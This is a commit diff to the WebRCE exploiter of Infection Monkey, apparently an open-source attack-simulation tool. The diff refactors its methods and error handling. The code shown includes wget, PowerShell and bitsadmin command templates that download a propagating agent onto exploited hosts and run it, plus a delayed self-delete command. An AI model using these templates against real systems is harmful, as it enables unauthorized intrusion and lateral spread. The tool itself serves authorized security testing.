Final, tested framework fixes

infection_monkey/exploit/web_rce.py

@@ -107,7 +107,6 @@ class WebRCE(HostExploiter):
         else:
             extensions = [""]
         for port in ports:
-            extensions = [(e[1:] if '/' == e[0] else e) for e in extensions]
             for extension in extensions:
                 if port[1]:
                     protocol = "https"
@@ -127,9 +126,12 @@ class WebRCE(HostExploiter):
             resp = self.exploit(url, ARCH_LINUX)
             if resp:
                 # Pulls architecture string
-                # TODO TEST IF NOT FOUND
                 arch = re.search('(?<=Architecture:)\s+(\w+)', resp)
-                arch = arch.group(1)
+                try:
+                    arch = arch.group(1)
+                except AttributeError:
+                    LOG.error("Looked for linux architecture but could not find it")
+                    return False
                 if arch:
                     return arch
                 else:
@@ -167,7 +169,7 @@ class WebRCE(HostExploiter):
         else:
             paths.extend([self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_64])
         for path in paths:
-            if self.check_remote_file(url, path):
+            if self.check_remote_monkey_file(url, path):
                 return True
         return False
 
@@ -179,15 +181,15 @@ class WebRCE(HostExploiter):
         :param names: [] of service names. Example: ["http"]
         :return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
         """
-        ports = WebRCE.get_open_service_ports(self.host, ports, names)
+        ports = self.get_open_service_ports(ports, names)
         if not ports:
             LOG.info("All default web ports are closed on %r, skipping", host)
             return False
         else:
             return ports
 
-    def set_host_arch(self, exploiter, url):
-        arch = WebRCE.get_host_arch(exploiter, url)
+    def set_host_arch(self, url):
+        arch = self.get_host_arch(url)
         if not arch:
             LOG.error("Couldn't get host machine's architecture")
             return False
@@ -203,7 +205,7 @@ class WebRCE(HostExploiter):
         :return: {'response': response/False, 'path': monkeys_path_in_host}
         """
         LOG.info("Trying to upload monkey to the host.")
-        src_path = get_target_monkey(host)
+        src_path = get_target_monkey(self.host)
         if not src_path:
             LOG.info("Can't find suitable monkey executable for host %r", host)
             return False
@@ -213,7 +215,7 @@ class WebRCE(HostExploiter):
         if not path:
             return False
         # Create server for http download and wait for it's startup.
-        http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path)
+        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
         if not http_path:
             LOG.debug("Exploiter failed, http transfer creation failed.")
             return False
@@ -223,10 +225,9 @@ class WebRCE(HostExploiter):
             return False
         # Choose command:
         if commands:
-            command = WebRCE.get_command(self.host, path, http_path, commands)
+            command = self.get_command(path, http_path, commands)
         else:
-            command = WebRCE.get_command(self.host, path, http_path,
-                                         {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
+            command = self.get_command(path, http_path, {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
 
         resp = self.exploit(url, command)
 
@@ -283,10 +284,10 @@ class WebRCE(HostExploiter):
         LOG.info("Trying to execute remote monkey")
         # Get monkey command line
         if dropper and path:
-            monkey_cmd = build_monkey_commandline(host, get_monkey_depth() - 1, path)
+            monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
             command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
         else:
-            monkey_cmd = build_monkey_commandline(host, get_monkey_depth() - 1)
+            monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
             command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd}
         try:
             resp = self.exploit(url, command)
@@ -306,6 +307,3 @@ class WebRCE(HostExploiter):
             return False
         LOG.info("Execution attempt finished")
         return resp
-
-
-

infection_monkey/model/__init__.py

@@ -17,8 +17,7 @@ RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObje
 DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
 
 # Commands used for downloading monkeys
-POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%(http_path)s\\\' -OutFile \\\'%(monkey_path)s\\\' -UseBasicParsing\""
-POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
+POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
 WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
 RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
 CHMOD_MONKEY = "chmod +x %(monkey_path)s"